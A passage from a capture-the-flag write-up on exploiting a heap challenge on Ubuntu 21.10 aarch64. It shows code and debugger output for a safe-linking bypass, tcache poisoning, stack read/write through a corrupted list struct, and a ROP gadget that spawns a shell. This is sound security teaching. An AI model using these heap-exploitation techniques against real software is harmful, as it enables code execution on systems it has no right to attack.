Eventually, since we did solve a challenge that is more “relevant” to today’s libc versions, with further mitigations enabled, and the whole point of this blogpost is to exploit the challenge on Ubuntu 21.10, I decided to leave it and just rebuild the challenge with a 15-byte read in read_long :P I could have replaced the atol call with strtol, but that’s a bigger change and I wanted to change as little as possible. And just to be clear, this is the only change I made to the challenge’s source code.

Now, let’s start the interesting part.

Exploit - Ubuntu 21.10

Well, if you run this exploit on Ubuntu 21.10, you’ll get the following abort:

Program received signal SIGABRT, Aborted.
__pthread_kill_implementation (threadid=281473079164944, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
44	pthread_kill.c: No such file or directory.
(gdb) bt
#0  __pthread_kill_implementation (threadid=281473079164944, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
#1  0x0000ffff8ecf9114 in __pthread_kill_internal (signo=<optimized out>, threadid=<optimized out>) at pthread_kill.c:80
#2  0x0000ffff8ecb3f7c in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
#3  0x0000ffff8eca0d30 in __GI_abort () at abort.c:79
#4  0x0000ffff8eced078 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0xffff8edcef60 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#5  0x0000ffff8ed0369c in malloc_printerr (str=str@entry=0xffff8edcaa20 "malloc(): unaligned tcache chunk detected") at malloc.c:5543
#6  0x0000ffff8ed076d8 in tcache_get (tc_idx=<optimized out>) at malloc.c:3082
#7  __GI___libc_malloc (bytes=bytes@entry=95) at malloc.c:3200
#8  0x0000ffff8ed0a1f0 in __GI___strdup (s=0xffffdf753368 'A' <repeats 88 times>, "<\347\316\216\377\377") at strdup.c:42
#9  0x0000ffff8ee20a68 in ?? ()
#10 0x64253d676e6f6c28 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)

Interesting. What’s going on here?

freelist hardening

Indeed, new versions of libc include an additional mitigation (safe-linking) that protects freelist entries. This hardening has been detailed in a few blogposts before (example), so I won’t cover it here (no point in repeating content). As has been demonstrated before, this mitigation is easily bypassable: it’s basically built on the assumption that the attacker doesn’t know where the heap is.

Well, we certainly do know where the heap is. So, let’s dig, bypass this, and conclude with an exploit that works for the latest version of Ubuntu as well. To be honest, it couldn’t be easier:

    # bypassing new pointer encoding
    last_freed = int(get(p, strings_idx[-1], TYPE_LONG))
    print("[*] last_freed == 0x%x" % last_freed)
    delete(p, strings_idx[:-1])

    print("[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write")
    edit(p, 1, TYPE_LONG, list_data_ptr)
    delete(p, 1)

    print("[*] corrupt list_data_ptr->FD, make it point to __free_hook")
    target_addr = (free_hook-0x58) ^ (last_freed >> 12)
    edit(p, 0, TYPE_LONG, target_addr)
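The XOR in target_addr is glibc’s safe-linking (PROTECT_PTR, glibc 2.32 and later): the next pointer stored at address pos is kept as (pos >> 12) ^ ptr. Strictly, pos is the address of the freed list->data chunk itself, but the exploit uses last_freed; that works because both live in the same 4 KiB page, so the shift yields the same key. The sketch below checks this with the addresses from the log that follows, and also checks the 16-byte alignment that tcache_get enforces (the source of the “unaligned tcache chunk detected” abort above). The function names mirror the glibc macros but are only illustrative Python.

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """Safe-linking: mangle `ptr` before storing it at address `pos`."""
    return (pos >> 12) ^ ptr

def reveal_ptr(pos: int, stored: int) -> int:
    """Undo protect_ptr for the value stored at `pos`."""
    return (pos >> 12) ^ stored

def aligned_ok(addr: int) -> bool:
    """tcache_get() aborts unless the revealed chunk is 16-byte aligned."""
    return addr & 0xf == 0

list_data_ptr = 0xaaaaf28072f0      # the freed list->data chunk (from the log)
last_freed = 0xaaaaf2807950         # the leaked heap address the exploit uses
target = 0xffff8b9634a8 - 0x58      # __free_hook - 0x58

stored = protect_ptr(last_freed, target)            # what edit() writes
print(last_freed >> 12 == list_data_ptr >> 12)      # True: same page, same key
print(hex(reveal_ptr(list_data_ptr, stored)))       # 0xffff8b963450
print(aligned_ok(target))                           # True
```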

Let’s see if our arbitrary write worked out. This is the output until the last call to free:

[*] good, now fpool[0] points to list. list_data_ptr == 0xaaaaf28072f0
[*] edit list[1] to point to list[0], which has main_arena symbol in its content
/usr/local/lib/python3.9/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] delete list[0], move list[1] one position backward
[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc
[*] heap_addr @ 0xaaaaf28077c0
[*] main_arena @ 0xffff8b95cb48
[*] resolved addresses:
    libc @ 0xffff8b7c1000
    __free_hook @ 0xffff8b9634a8
    system @ 0xffff8b80b6b4
[*] last_freed == 0xaaaaf2807950
[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write
[*] corrupt list_data_ptr->FD, make it point to __free_hook
[*] __free_hook('/bin/sh/') 

Breaking into the debugger and dumping the memory at __free_hook:

(gdb) x/8gx 0xffff8b9634a8 
0xffff8b9634a8 <__free_hook>:	0x0000ffff8b80b6b4	0x0000000000000000
0xffff8b9634b8 <__after_morecore_hook>:	0x0000000000000000	0x0000000000000000
0xffff8b9634c8 <mallwatch>:	0x0000000000000000	0x0000000000000000
0xffff8b9634d8 <olds.0>:	0x0000000000000000	0x0000000000000000
(gdb) x/4i 0x0000ffff8b80b6b4
   0xffff8b80b6b4 <__libc_system>:	cbz	x0, 0xffff8b80b6bc <__libc_system+8>
   0xffff8b80b6b8 <__libc_system+4>:	b	0xffff8b80b220 <do_system>
   0xffff8b80b6bc <__libc_system+8>:	str	x30, [sp, #-16]!
   0xffff8b80b6c0 <__libc_system+12>:	adrp	x0, 0xffff8b912000
(gdb) 

It works, we’ve got our arbitrary write back :) Unfortunately, system() wasn’t called. Why?

malloc hooks

As it turns out, the malloc hooks were disabled in new versions of libc: starting with glibc 2.34 (the version Ubuntu 21.10 ships), free() no longer calls __free_hook, so corrupting it doesn’t help us anymore. For more information regarding this, check out this article.

corrupt the stack

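Well, we don’t need to worry. We have an arbitrary write, as many arbitrary reads as we want, (almost-)controlled content at known addresses, and we know libc’s base. Nothing can stop us now; we’ve already won. I decided to go old school, with the following plan:

  1. leak a stack address and scan the stack with the arbitrary read until we find a suitable return address
  2. point the poisoned freelist entry just below that return address, so the 0x60-byte allocation overwrites it with system
  3. make sure the first argument (x0) points to our controlled string when that function returns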

First, let me define the proper arbitrary_read function (we did it before, it’s very simple):

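def arbitrary_read(p, addr):
    # store addr as a long, then read the same slot back as a string pointer
    idx = add(p, TYPE_LONG, bytes(str(addr), "utf-8"))
    # printf("%s") stops at the first NUL, so only the bytes before it come back
    val = u64(get(p, idx, TYPE_STRING)[:8].ljust(8, b"\x00"))
    delete(p, idx)
    return val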
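The stack scan itself isn’t reproduced in this post, so here is only a hypothetical Python sketch of the idea: starting from a known stack address, read qwords downwards and stop at the first one that points into a chosen code range (for example libc’s text). read_qword stands for something like arbitrary_read above; keep in mind that a %s-based read stops at NUL bytes, so a real scan has to cope with partially read values. The addresses in the usage example come from the gdb dump further down; the range bounds are illustrative.

```python
from typing import Callable, Optional

def find_return_slot(read_qword: Callable[[int], int], start: int,
                     lo: int, hi: int, max_slots: int = 0x400) -> Optional[int]:
    """Walk down from `start` in 8-byte steps and return the first stack slot
    whose value lies in [lo, hi), or None if nothing matches."""
    addr = start & ~0x7
    for _ in range(max_slots):
        addr -= 8
        if lo <= read_qword(addr) < hi:
            return addr
    return None

# Fake memory standing in for the target's stack (values from the gdb dump below).
fake_stack = {
    0xffffd47cfe30: 0x0000ffffd47cfe40,   # a stack pointer: outside the range
    0xffffd47cfe38: 0x0000ffff85055ffc,   # a return address into libc
}
slot = find_return_slot(lambda a: fake_stack.get(a, 0), 0xffffd47cfe48,
                        lo=0xffff85000000, hi=0xffff85200000)
print(hex(slot))   # 0xffffd47cfe38
```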

After implementing the stack scan (see the code), we can go back to our exploit and use our arbitrary write (through the return value of malloc) to corrupt the stack. However, because we have to write 0x60 bytes (slightly less, but you get the idea), I expect the stack cookie to crash us. Let’s see:

Program received signal SIGABRT, Aborted.
__pthread_kill_implementation (threadid=281473748176912, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
44	pthread_kill.c: No such file or directory.
(gdb) bt
#0  __pthread_kill_implementation (threadid=281473748176912, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
#1  0x0000ffffb6afe114 in __pthread_kill_internal (signo=<optimized out>, threadid=<optimized out>) at pthread_kill.c:80
#2  0x0000ffffb6ab8f7c in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
#3  0x0000ffffb6aa5d30 in __GI_abort () at abort.c:79
#4  0x0000ffffb6af2078 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0xffffb6bd2470 "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
#5  0x0000ffffb6b74248 in __GI___fortify_fail (msg=msg@entry=0xffffb6bd2458 "stack smashing detected") at fortify_fail.c:26
#6  0x0000ffffb6b74214 in __stack_chk_fail () at stack_chk_fail.c:24
#7  0x0000aaaac0030ecc in add ()
#8  0x0000ffffb6ac56b4 in cancel_handler (arg=0xffffcf485028) at ../sysdeps/posix/system.c:96
#9  0x00000000b6aa5fc0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)

Yep, no surprises here: __stack_chk_fail triggers the expected abort.

Just to make sure we corrupted the return address I intended, let’s disable the stack cookie for a second, and rerun our exploit. Set a breakpoint on system:

Breakpoint 1, __libc_system (line=0xffffd47cfdb0 'A' <repeats 64 times>) at ../sysdeps/posix/system.c:202
202	../sysdeps/posix/system.c: No such file or directory.
(gdb) x/18gx $x0
0xffffd47cfdb0:	0x4141414141414141	0x4141414141414141
0xffffd47cfdc0:	0x4141414141414141	0x4141414141414141
0xffffd47cfdd0:	0x4141414141414141	0x4141414141414141
0xffffd47cfde0:	0x4141414141414141	0x4141414141414141
0xffffd47cfdf0:	0x0000000000000000	0x4141414141414141
0xffffd47cfe00:	0x4141414141414141	0x0000ffff850756b4
0xffffd47cfe10:	0x0000000000000000	0x0000000000000000
0xffffd47cfe20:	0x0000aaaaf9a0e2a0	0x0000000085055fc0
0xffffd47cfe30:	0x0000ffffd47cfe40	0x0000ffff85055ffc
(gdb) x/2i 0x0000ffff850756b4
=> 0xffff850756b4 <__libc_system>:	cbz	x0, 0xffff850756bc <__libc_system+8>
   0xffff850756b8 <__libc_system+4>:	b	0xffff85075220 <do_system>
(gdb) 

Yes, we did! We corrupted a return address, and conveniently enough (well, I targeted this flow on purpose :) ), the first argument is our controlled string! You can also see that right after our 0x41s sits the address of system. That is the value our arbitrary write placed there: I set the target address of the arbitrary write to return_addr-0x58 (a reminder: we corrupted a freelist entry, and we need an allocation of 0x60 bytes for malloc to hand us that address).
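The offsets can be checked against the gdb dump above. Here is a quick sanity check in Python. It uses the addresses from this particular run, which change every run because of ASLR. The write starts at target_addr, which is return_addr - 0x58, so the last 8 bytes of the 0x60-byte "allocation" land exactly on the saved return address.

```python
# Addresses copied from the gdb session and exploit log above (ASLR: they differ per run).
target_addr = 0xFFFFD47CFDB0   # start of our fake 0x60-byte allocation (also x0 in system)
system_slot = 0xFFFFD47CFE08   # stack slot holding 0x0000ffff850756b4 (__libc_system) in the dump
ALLOC_SIZE = 0x60

# The exploit places the allocation so that the saved return address is its last 8 bytes.
return_addr = target_addr + 0x58
assert return_addr == system_slot
assert target_addr + ALLOC_SIZE - 8 == return_addr
print(hex(return_addr))  # 0xffffd47cfe08
```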

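Well, there are two problems we need to solve. The first is the stack cookie, which our 0x60-byte write clobbers. The second is that our command string lives on the stack, in memory that system is about to use for its own stack frame.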

Let’s see the second problem in action. You can see that our command clearly fails:

[*] env_ptr == ffffd47cffd8
[*] stack_addr == 0xffffd47d0fcc
[*] found good return address! *(0xffffd47cfe38) == 0xffff85055ffc
[*] last_freed == 0xaaaaf9a0e950
[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write
[*] corrupt list_data_ptr->FD, make it point to our callback target
[*] target_addr == 0xffffd47cfdb0
[*] exploit done, system('/bin/sh') achieved, call interactive()
[*] Switching to interactive mode
sh: 1: \xb0u!\x85\xff\xff: not found
$  

Yep, sh complains (rightfully) that this sequence of bytes (some VA) is not found. This happens because system overwrites our argument, and it has every right to. We “allocated” the string on the stack, in the very region that system claims for its own stack frame when it starts. When you think about it, what we did is not cool.

That’s fine, we can solve both of these problems. We have as many arbitrary reads as we like, and we know the layout of most of the virtual address space, so leaking the stack cookie is trivial. However, we can’t have NULL bytes in our allocated string, and the cookie contains a NULL byte. Because our arbitrary write has to be a string that triggers an allocation of 0x60 bytes, that’s an issue we would need to work around.
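To see why the NULL byte hurts, here is a small illustration. It assumes, for the sake of the example, that the allocation size is derived from the string length strlen-style. The canary value and the 0x48-byte offset are hypothetical. glibc clears the lowest byte of the canary, so on a little-endian target the packed canary *starts* with 0x00, and everything after it would be cut off.

```python
import struct


def c_strlen(buf: bytes) -> int:
    """Length that strlen() would report: everything up to the first NULL byte."""
    nul = buf.find(b"\x00")
    return len(buf) if nul == -1 else nul


# Hypothetical canary value: glibc zeroes its lowest byte, so little-endian
# packing places that 0x00 first.
canary = 0x5A3C91E7B2D46F00
packed = struct.pack("<Q", canary)
assert packed[0] == 0

# Hypothetical layout: 0x48 bytes of command, the canary, then 0x10 more bytes
# (up to and including the overwritten return address), 0x60 bytes in total.
payload = b"A" * 0x48 + packed + b"B" * 0x10
print(hex(len(payload)), hex(c_strlen(payload)))  # 0x60 0x48
```

The intended string is 0x60 bytes long, but anything length-based only "sees" the first 0x48, so it can no longer request the 0x60-byte chunk we need.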

However, I want to try another approach, which is much more elegant and simple :)

The last step - r/w to the stack - for the win

I think we’ll all be happier if we go for elegant tricks. And you know what’s elegant? Well, in my opinion, it would be super fun to corrupt the list structure itself (not the contents of list->data, to which we can write arbitrary values by design; the actual list structure):

typedef struct {
  int size;
  int max;
  Data *data;
} List;
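To make the layout concrete, here is a small ctypes mirror of List on a 64-bit little-endian target. It is an illustrative model: representing Data * as a plain 64-bit integer is an assumption for aarch64, and struct.pack stands in for pwntools’ p32/p64. It shows that the fake the exploit writes (32-bit size, 32-bit max, 64-bit data pointer) is byte-for-byte a List.

```python
import ctypes
import struct


class List(ctypes.LittleEndianStructure):
    """Mirror of the challenge's List struct on a 64-bit little-endian target.

    Data *data is modelled as a 64-bit integer (assumption: aarch64 pointers).
    """
    _fields_ = [
        ("size", ctypes.c_int32),
        ("max", ctypes.c_int32),
        ("data", ctypes.c_uint64),  # Data *data
    ]


# Field offsets: size @ 0, max @ 4, data @ 8; 16 bytes in total.
print(List.size.offset, List.max.offset, List.data.offset, ctypes.sizeof(List))  # 0 4 8 16

# Placeholder pointer value (return_addr from the 21.10 log, used only as an example).
fake_data_ptr = 0xFFFFCA54D5D8
fake = List(size=0x22222222, max=0x7FFFFFFF, data=fake_data_ptr)
assert bytes(fake) == struct.pack("<iiQ", 0x22222222, 0x7FFFFFFF, fake_data_ptr)
```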

With control over this structure, we can make list->data point to the stack! Then we can use the get/edit operations to simply read/write to the stack, and we are done. Let’s test it out:

    faked_size = 0x22222222
    for i in range(2):
        fake = b"D" * (corrupt_prefix_length)
        fake += p32(faked_size) # size
        fake += p32(0x7fffffff) # max, avoid reallocation
        fake += p64(return_addr - faked_size * 8 + 0x10 * 8) # data, so that &data[faked_size - 0x10] == return_addr
        add(p, TYPE_STRING, fake)

    # now list->data points to the stack. Test it out: let's corrupt the return address
    edit(p, faked_size - 0x10, TYPE_LONG, 0x4141414141)

And:

0x0000ffffa4b83a7c in __GI___libc_read (fd=0, buf=0xffffcbd5f948, nbytes=15) at ../sysdeps/unix/sysv/linux/read.c:26
26	../sysdeps/unix/sysv/linux/read.c: No such file or directory.
(gdb) c
Continuing.

Program received signal SIGBUS, Bus error.
0x0000004141414141 in ?? ()
(gdb) 

Yes! We created an interface that lets us read/write to the stack. No restrictions, no “no null bytes”, nothing. We can do whatever we like, and r/w to the stack using indices! Let’s drop a simple ROP chain, and we’re done. First of all, here is the simple gadget I chose in libc (nothing special about it, it’s just the first one that popped out when I looked for gadgets):

.text:0000000000132C8C LDP             X1, X0, [X19]
.text:0000000000132C90 LDP             X19, X20, [SP,#var_s10]
.text:0000000000132C94 LDP             X29, X30, [SP+var_s0],#0x20
.text:0000000000132C98 MOV             X16, X1
.text:0000000000132C9C BR              X16
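Here is what this gadget does, stepped through on a toy register/memory model in Python. It is a sketch, not an emulator. It assumes IDA’s var_s10/var_s0 resolve to #0x10/#0, which matches the usual arm64 epilogue. The X19 value is inferred from the exploit’s edit indices (return_addr + 56 * 8), and the SP value is a placeholder. The takeaway is that whatever X19 points to becomes the call target (X1 → X16) and the first argument (X0).

```python
MASK64 = (1 << 64) - 1


def run_gadget(regs: dict, mem: dict) -> dict:
    """Step through the libc gadget at offset 0x132C8C on a toy model.

    `mem` maps 8-byte-aligned addresses to 64-bit values; unset slots read as 0.
    """
    def rd(addr: int) -> int:
        return mem.get(addr & MASK64, 0)

    sp, x19 = regs["sp"], regs["x19"]
    out = dict(regs)
    out["x1"], out["x0"] = rd(x19), rd(x19 + 8)              # LDP X1, X0, [X19]
    out["x19"], out["x20"] = rd(sp + 0x10), rd(sp + 0x18)    # LDP X19, X20, [SP,#0x10]
    out["x29"], out["x30"] = rd(sp), rd(sp + 8)              # LDP X29, X30, [SP],#0x20
    out["sp"] = (sp + 0x20) & MASK64                         # post-index: SP += 0x20
    out["x16"] = out["x1"]                                   # MOV X16, X1
    out["pc"] = out["x16"]                                   # BR X16
    return out


SYSTEM = 0xFFFF8E70D6B4   # "system @" from the 21.10 log
BIN_SH = 0xAAAAB2C343B0   # bin_sh_addr from the same log
X19 = 0xFFFFCA54D798      # inferred: return_addr + 56 * 8
SP = 0xFFFFCA54D5E0       # placeholder stack pointer

state = run_gadget({"x19": X19, "sp": SP}, {X19: SYSTEM, X19 + 8: BIN_SH})
assert state["pc"] == SYSTEM and state["x0"] == BIN_SH  # i.e. system("/bin/sh")
```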

And the new part in the exploit:

    faked_size = 0x22222222
    for i in range(2):
        fake = b"D" * (corrupt_prefix_length)
        fake += p32(faked_size) # size
        fake += p32(0x7fffffff) # max, avoid reallocation
        fake += p64(return_addr - faked_size * 8 + 0x100 * 8)
        add(p, TYPE_STRING, fake)

    gadget_offset = 0x132c8c
    # now list->data points to the stack. Test it out: let's corrupt the return address, and set the content pointed by X19
    edit(p, faked_size - 0x100 + 56, TYPE_LONG, system_addr)
    edit(p, faked_size - 0x100 + 56 + 1, TYPE_LONG, bin_sh_addr)
    edit(p, faked_size - 0x100, TYPE_LONG, libc_base + gadget_offset)
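Why do these indices hit the right slots? Here is the index arithmetic in Python. It assumes 8-byte Data slots, as the exploit’s `* 8` implies, and uses return_addr from the 21.10 log. Whatever bias is added to the faked data pointer, index faked_size - bias lands on return_addr. The three edits above therefore write to return_addr + 0x0 (the gadget), + 0x1c0 (system_addr) and + 0x1c8 (bin_sh_addr).

```python
MASK64 = (1 << 64) - 1


def slot_address(data_ptr: int, index: int) -> int:
    """Address of list->data[index], assuming 8-byte Data slots."""
    return (data_ptr + index * 8) & MASK64


faked_size = 0x22222222
return_addr = 0xFFFFCA54D5D8  # return_addr from the 21.10 run log

# The first test used a bias of 0x10 slots, the final exploit 0x100.
for bias in (0x10, 0x100):
    data_ptr = (return_addr - faked_size * 8 + bias * 8) & MASK64
    assert slot_address(data_ptr, faked_size - bias) == return_addr

data_ptr = (return_addr - faked_size * 8 + 0x100 * 8) & MASK64
writes = {
    "gadget (new return address)": faked_size - 0x100,
    "system_addr (loaded into X1)": faked_size - 0x100 + 56,
    "bin_sh_addr (loaded into X0)": faked_size - 0x100 + 56 + 1,
}
for what, idx in writes.items():
    offset = slot_address(data_ptr, idx) - return_addr
    print(f"{what:30} return_addr + {offset:#x}")
```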

Now, let’s run it:

root@dd90edacb085:/chg# python3 solve.py 
[+] Starting local process './distfiles/chg': pid 34
attach
[*] '/lib/aarch64-linux-gnu/libc.so.6'
    Arch:     aarch64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/chg/distfiles/chg'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] good, now fpool[0] points to list. list_data_ptr == 0xaaaab2c342f0
[*] edit list[1] to point to list[0], which has main_arena symbol in its content
/usr/local/lib/python3.9/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] delete list[0], move list[1] one position backward
[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc
[*] heap_addr @ 0xaaaab2c347c0
[*] main_arena @ 0xffff8e85eb48
[*] resolved addresses:
    libc @ 0xffff8e6c3000
    system @ 0xffff8e70d6b4
[*] env_ptr == 0xffffca54d7a8
[*] stack_addr == 0xffffca54dfcc
[*] stack_cookie == 0xaaaab2c342a0
[*] found good return address! *(0xffffca54d608) == 0xffff8e6edffc
[*] return_addr == 0xffffca54d5d8
[*] target_addr == 0xaaaab2c342a0
[*] bin_sh_addr == 0xaaaab2c343b0
[*] last_freed == 0xaaaab2c34950
[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write
[*] corrupt list_data_ptr->FD, make it point to an address on the heap before the list structure
[*] exploit done, system('/bin/sh') achieved, call interactive()
[*] Switching to interactive mode
$ lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 21.10
Release:    21.10
Codename:    impish
$ ls
challenge  distfiles  flag.txt    solve.py
$ cat flag.txt
ThisIsMyFlag
$ 
[*] Interrupted
[*] Stopped process './distfiles/chg' (pid 34)
root@dd90edacb085:/chg# 

Done :) The exploit works with all the mitigations in place, without any assumptions.

The curious reader might ask: “wait, why use the arbitrary write at all? Why not just do the arbitrary free on the list structure, to begin with?”. Well, the answer is very simple - you can’t :) To do the arbitrary free, we need the VA to be in the fpool array, which means we need to allocate and free a string before the list structure is allocated. And we can’t do that :)

Summary

I hope I summarized some of the major changes in the modern libc versions that the latest Ubuntu releases ship by default.

As you can see, throughout this write-up I ran the challenge on aarch64, in Ubuntu 20.04 and Ubuntu 21.10 docker containers. I also tested solve_20.04.py on an Ubuntu x64 machine, and it works the same (modulo the path to libc and the main_arena offset, of course). The 21.10 solution obviously needs offset changes for x64, and the ROP gadget above is aarch64-specific.

The exploits are in this repo: solve_20.04.py and solve_21.10.py. All the challenge materials are in the challenge directory, here (copied from the repo linked at the beginning of this blogpost).

Thanks,

Saar Amar